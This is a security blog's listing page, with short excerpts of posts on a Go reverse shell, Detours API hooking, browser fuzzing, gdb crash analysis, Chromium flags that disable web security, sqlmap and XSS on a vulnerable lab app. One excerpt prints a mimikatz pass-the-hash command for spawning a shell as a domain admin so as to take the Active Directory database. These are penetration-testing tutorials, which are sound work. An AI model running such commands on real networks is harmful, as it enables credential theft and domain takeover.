Latest Posts Under: Security

Here is a really small Go reverse shell (30-ish lines of code that includes comments). Environment setup: Download/install Go from here. If you use Windows, you may want to download/install the TDM-GCC compiler from here as well. Code: First, we need to define what libraries we need: import "net" import "fmt" import "bufio" import "os/exec"…

Below is a basic example on how to use the detours library to hook APIs. #include <stdio.h> #include <windows.h> #include <detours.h> // API that we want to hook DWORD (WINAPI * Real_SleepEx)(DWORD dwMilliseconds, BOOL bAlertable) = SleepEx; // This function will be called *before* the API. // We will modify one of the parameters //…

I've made some changes to bytefuzz to support files generated by other fuzzers. I've used the domato fuzzer to generate 1000 html files and then through bytefuzz, I've sent those files to a browser that I use when I do web app security testing. And soon enough, I got some interesting results… 🙂

Let's assume you have a program that just crashed and you have a core dump. You can enable core dumps by using the ulimit -c unlimited command. If you want to analyze what happened, here are some steps you can follow: //This will switch the disassembly listing to intel format. (gdb) set disassembly-flavor intel //To…

If you want to do web app security testing using either Chrome or Chromium, you may want to disable a few security options so you can actually go through your test cases. You can use the same command line parameters for both of them: /usr/bin/chromium --disable-web-security --disable-xss-auditor --ignore-certificate-errors --user-data-dir=/pentesting/web/temp/data --proxy-server=127.0.0.1:8080 This works for both Linux…

If you have a hash for either a domain admin or a local admin on a domain controller, you can use mimikatz to exfil the entire Active Directory database. From mimikatz, run the following command to spawn a shell as the target user: sekurlsa::pth /user:<username> /domain:<domainname> /ntlm:<hash> /run:cmd.exe Now you have a few options from…

Today we're going to look at using sqlmap when the target website uses base64 encoded parameters. For example, we have something like: http://<target>/products/article.php?art_id=<base64_encoded_value> In this case we have to "convince" sqlmap that when scanning, to use base64 for all payloads. Well, I guess it's a good thing that sqlmap has the following option which allows…

In this post we'll have a look at the nodejs XSS attack/exploit in XVNA (eXtreme Vulnerable Node Application). Cross-site scripting is part of the OWASP Top 10 list that was published in 2017. We'll use the setup detailed here (XVNA runs on port 80). As a web proxy, Burp or ZAP are highly recommended, but you can use anything else that allows you…
